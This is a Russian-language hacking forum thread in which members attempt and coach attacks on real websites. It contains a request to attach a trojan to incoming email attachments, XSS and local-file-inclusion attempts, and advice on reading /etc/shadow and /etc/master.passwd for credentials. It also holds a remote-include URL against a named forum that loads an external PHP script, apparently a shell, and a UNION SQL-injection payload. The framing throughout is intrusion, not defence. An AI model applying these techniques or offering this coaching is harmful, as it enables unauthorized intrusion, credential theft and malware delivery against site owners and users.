отслеживай все входящие письма и если придет аттач с каким-либо исполняемым файлом прикрепи к нему троян раньше чем он прочитает это письмо
на одном сайте с помощью конструкции <script>alert('xss')</script#x3E; в теле обьявы появляется <script>alert()</script> но алерт не вылезает. не судьба?))
в браузере видешь как надо, а в коде заменяется специальные символы и нечего не исполняется. это такая функция в пхп : htmlspecialchars — Преобразует специальные символы в HTML сущности Короче в этом месте хсс можешь не искать)
простите, возможно не в ту тему запостил.. нашол уязвимость форматирование строки.. где можно прочитать про єто, и как заюзать?
eLWAux Если ТЫ нашёл уязвимость, то это ТЫ должен описать метод её реализации и получить за это респекты, а не спрашивать.
Думаю есть, я имел в виду что именно в том куске где ты пытался кинуть этот алерт хсс нету! а ты полазий по сайту может найдешь че-то интересное, хочешь, ссылку в лс посмотрим что там интересного.
Нашел локальный инклюд залил картинку с пхп кодом, но нуль байт не прокатывает чё делать? Движёк самописный Код скорее всево такой PHP: if(file_exists($patch.'/'.$file.'.php')){ include($patch.'/'.$file.'.php'); }
а ты ничего и не сможешь делать, кроме как инклудить пхп файлы, который защищены, например ХТАККЕССОМ, и искать в них новые баги - но это ещё и от везения зависит
эмм, попробуй поставить ? index.php?file=путь/к/картинке.jpg? хотя помойму это катит только прри удалённых инклудах
Да это кактит только при удалённых инклудах. Инлудить файл локально и передавать ему при этом параметр (через get или post) нельзя, поэтому конструкция типа ('include.php?a=1') работать не будет. PHP: if(file_exists($patch.'/'.$file.'.php')){ include($patch.'/'.$file.'.php'); } Если ты здесь можешь менять только переменную $file и %00 не прокатывает, то инклудить можно будет только файлы с расширением php. А если можешь менять переменную $patch, то это уже удалённый инклуд.
Вопрос знатокам. Есть бажный сайт.Скуля,файл прив включён.Возможность просматривать все дериктории, начиная с кореневого каталога.Записать шелл через скулю не получается =(. Заливка через админку тоже не проконала.Скуль менеджер не найден(.А теперь вопрос. Где в юниксе хранятся пароли от ssh ftp итд ,что бы как-то всё-же получить доступ к сайту?
/etc/passwd or GNU/Linux==/etc/shadow or freeBsd==/etc/master.passwd 2geforse в паблике только http://www.securitylab.ru/poc/292387.php
Cmucl, некоторые фтп демоны хранят свои пароли в мускуле и тп субд А от пароли юзеров, как уже сказал MaSTeR GэN, хранятся в /etc/shadow (Linux) и /etc/master.passwd (*BSD), вот только доступ к ним в 99% случаев имеет только рут
Посмотрел! И почему не работает?? http://forum.tvingo.ru/includes/functions.php?phpbb_root_path=http://www.vkavkaz.tu2.ru/s1.php Я же правельно всё зделала?
при запросе -1+union+select+1,2,3,4,5,6,7,8,9,0,1,2/* выдает ошибку Query failed : Illegal mix of collations (utf8_general_ci,IMPLICIT) and (cp1251_general_ci,COERCIBLE) for operation 'UNION' как так?)) union же команда ее разве нада кодировать?)
